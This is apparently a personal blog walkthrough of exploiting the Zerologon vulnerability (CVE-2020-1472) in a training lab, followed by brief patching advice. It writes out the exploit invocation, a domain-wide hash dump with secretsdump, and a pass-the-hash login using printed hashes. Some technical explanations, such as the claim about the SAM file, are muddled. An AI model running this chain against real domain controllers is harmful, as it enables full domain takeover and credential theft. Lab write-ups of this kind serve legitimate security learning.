CVE - 2020–1472 (Zerologon Vulnerability)-Exploitation & Remediation
Zerologon (CVE 2020-1472) Vulnerability
Last updated
Zerologon (CVE 2020-1472) Vulnerability
Last updated
NOTE: This is my first vulnerability-related writeup and I have tried to write and explain in layman terms. There may be knowledge gaps in between, which I am trying my hardest to cover and understand
I have tried to reproduce the vulnerability in this blog entry, while trying to understand it's severity and impact
Netlogon is a service that runs on the Domain Controller. This service is responsible for authenticating user logins — effectively verifying the user is who they claim to be. As this function is one of the core functions of a Domain Controller, the Netlogon service cannot be stopped or firewalled off from networks of domain-joined computers.
CVSS Score — 10
Attack Complexity — Low
Privileges Required — Low
Vulnerability Found — July 2020
The Netlogon RPC service, used for computer and user authentication in Windows, also allows a computer to update its computer password within the domain. For several historical reasons, this service does not use standard authentication protocols to authenticate the computer. The vulnerability exists within the non-standard method used to authenticate.
Twitter thread providing a nice walkthrough — https://twitter.com/_dirkjan/status/1306280553281449985
What do you need?
Impacket — to capture password hashes and dump them
Windows 10 OS (on which the vulnerable service exists)
Windows 10 VM — to perform the exploit on RangeForce’s
ZeroLogon Vulnerability Lab (Guided Mode)
First, let’s clone the impacket repository from Github
Step to install:-
Now, let’s copy the exploit too from Github <cve-2020–1472-exploit.py>
Credits to dirkjanm.
https://github.com/dirkjanm/CVE-2020-1472/blob/master/cve-2020-1472-exploit.py
Export the exploit to /impacket/examples/CVE-2020–1472/
Now, let’s switch to this directory
By now, we have identified the following details about the vulnerable service:-
NetBIOS computer name: DC IP address: 192.168.0.4
Syntax of exploit command:- ./cve-2020–1472-exploit.py -n <NetBIOS computer name> -t <IP address>
Now to run the script and exploit
./cve-2020–1472-exploit.py -n DC -t 192.168.0.4
It resets the Domain Controller’s account password to an empty string(easy login with a spacebar)
The gist: Your Domain Controller account’s password is a blank string
**Next objective-**dump password hashes from the Domain Controller
Domain Controller name NetBios Name IP Address of vulnerable host
We make use of the secretsdump.py module from Impacket to perform this task
Password Dump command syntax- python3 secretsdump.py -no-pass -just dc<Domain/NETBIOS_NAME\[email protected]>
(This command does not work with the simple execution command ./)
Filling in the blanks:-
python3 secretsdump.py -no-pass -just-dc CONTOSO.AZURE/DC\$@192.168.0.4
This leads to the dumping of around 60 password hashes:-
Next objective — Logging onto the account of ContosoAdmin (Domain Controller admin’s account) — using the account’s dumped hash
Scrolling through the dumped list, we find the appropriate entry:-
Logging on to the server, using the wmiexec.py module:-
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:a2bd759faf686d052f5f7c8337a2ff51 CONTOSO.AZURE/DC\$@192.168.0.4
We are in!
How?
Manually restoring your password (or)
Update and install the August 2020 & February 2021 Patch Tuesday release for the same (patches released in two phases)
As you exploit the vulnerability, the password hash is being erased and replaced with a blank string in the SAM file, from where your computer cross-checks passwords as a user logs in
Using the same methodology, we copy your compromised password (blank space in this case) from the SAM hive to the Domain Controller of the exploited machine. Further, copy it to your Kali VM and then delete it from the Domain Controller
Which we achieve from the following steps:-
Now exiting the Windows machine, using exit- to the Kali machine
The next task is to parse the obtained SAM file, from the Domain Controller
Recovered password hash — 89ed2eb25e25770b7dd850e797ef8c7b49cc4d793ea50f9db33fe91cde5b97c20b8aa582a3acd371618e7f7ed5ad9ee87df1d073641c6718cb63ed7409711480
Now to place the final piece of the jigsaw — restoring the original password. For that, we have a customized script named — reinstall_original_pw.py
Syntax — reinstall_original_pw.py <DC_NETBIOS_NAME> <DC_IP_ADDR> <ORIG_NT_HASH>
Filling in the blanks here,
./reinstall_original_pw.py DC 192.168.0.4 89ed2eb25e25770b7dd850e797ef8c7b49cc4d793ea50f9db33fe91cde5b97c20b8aa582a3acd371618e7f7ed5ad9ee87df1d073641c6718cb63ed7409711480
This is an easy vulnerability to exploit, with less complexity, considering that we are still dependant on IT Systems to perform administrative tasks. This may be disputed, but 100% security may be a myth unless drastic action is taken to respond and patch even the slightest of issues
Thank you for the time taken to devour this purple team blog entry.
My audience has a voice. Feel free to reach out to me, on my socials (links are on top of this page) for any queries to be addressed. Dropping a sweet message would make my day
Let your opinion about this write-up be known, by selecting any one of the emojis below!
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL Why parse? — To see where accounts are mapped to and to gain other information